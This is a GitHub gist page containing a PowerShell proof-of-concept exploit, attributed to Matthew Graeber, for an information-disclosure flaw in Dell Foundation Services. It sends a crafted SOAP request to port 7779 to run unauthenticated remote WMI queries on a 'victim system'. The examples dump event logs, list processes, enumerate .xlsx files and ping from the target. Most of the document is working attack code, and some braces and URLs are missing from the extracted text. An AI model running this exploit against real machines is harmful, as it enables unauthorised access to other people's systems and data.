Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Perform unauthenticated WMI queries on a Dell Foundation Services server
function Get-DellFoundationServicesWmiObject {
Performs a WMI query on a Dell Foundation Services server.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Get-DellFoundationServicesWmiObject exploits the information disclosure vulnerability described here:
This function allows you to perform unauthenticated remote WMI queries within the root/cimv2 namespace on a victim system.
Specifies the IP address of the victim system
Specifies a well-formed WMI query for objects within the root/cimv2 namespace. i.e. most Win32_* class instances.
.PARAMETER FakeNamespaceDomain
Specifies a fake SOAP namespace domain.
Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM Win32_NtLogEvent WHERE Logfile="System"'
Dumps the System event log
Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM Win32_PingStatus WHERE Address=""'
Pings from the victim system.
Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM CIM_DataFile WHERE Extension="xlsx"'
Lists all .xlsx files present on the system.
Get-DellFoundationServicesWmiObject -IPAddress -Query 'SELECT * FROM Win32_Process'
Lists all running processes
param (
$FakeNamespaceDomain = ''
$URI = 'http://{0}:7779/Dell%20Foundation%20Services/ISystemInfoCapabilitiesApi' -f $IPAddress
$SoapRequest = [Xml] @"
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="" xmlns:ns1="http://$FakeNamespaceDomain/" xmlns:xsd="" xmlns:xsi="" xmlns:SOAP-ENC="" SOAP-ENV:encodingStyle="">
<ns1:wmiQuery xsi:type="xsd:string">$Query</ns1:wmiQuery>
# Slightly modified code from
$WebRequest = [Net.WebRequest]::Create($URI)
$WebRequest.ContentType = 'text/xml; charset=utf-8'
$WebRequest.Accept = 'text/xml'
$WebRequest.Method = 'POST'
$ResponseXml = $null
try {
$RequestStream = $WebRequest.GetRequestStream()
$Response = $WebRequest.GetResponse()
$ResponseStream = $Response.GetResponseStream()
$StreamReader = [IO.StreamReader]($ResponseStream)
$ResponseXml = [Xml] $StreamReader.ReadToEnd()
} catch {
throw $_
if ($ResponseXml -and ($ResponseXml.Envelope.Body.GetWmiCollectionResponse.GetWmiCollectionResult.WmiManagementItem)) {
$WMIManagementItems = @($ResponseXml.Envelope.Body.GetWmiCollectionResponse.GetWmiCollectionResult.WmiManagementItem)
foreach ($Object in $WMIManagementItems) {
$Properties = @{
ClassName = $Object.ClassName
Endpoint = $Object.Endpoint
Namespace = $Object.Namespace
Properties = $Object.WmiProperties.WmiTriplet
New-Object PSObject -Property $Properties
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment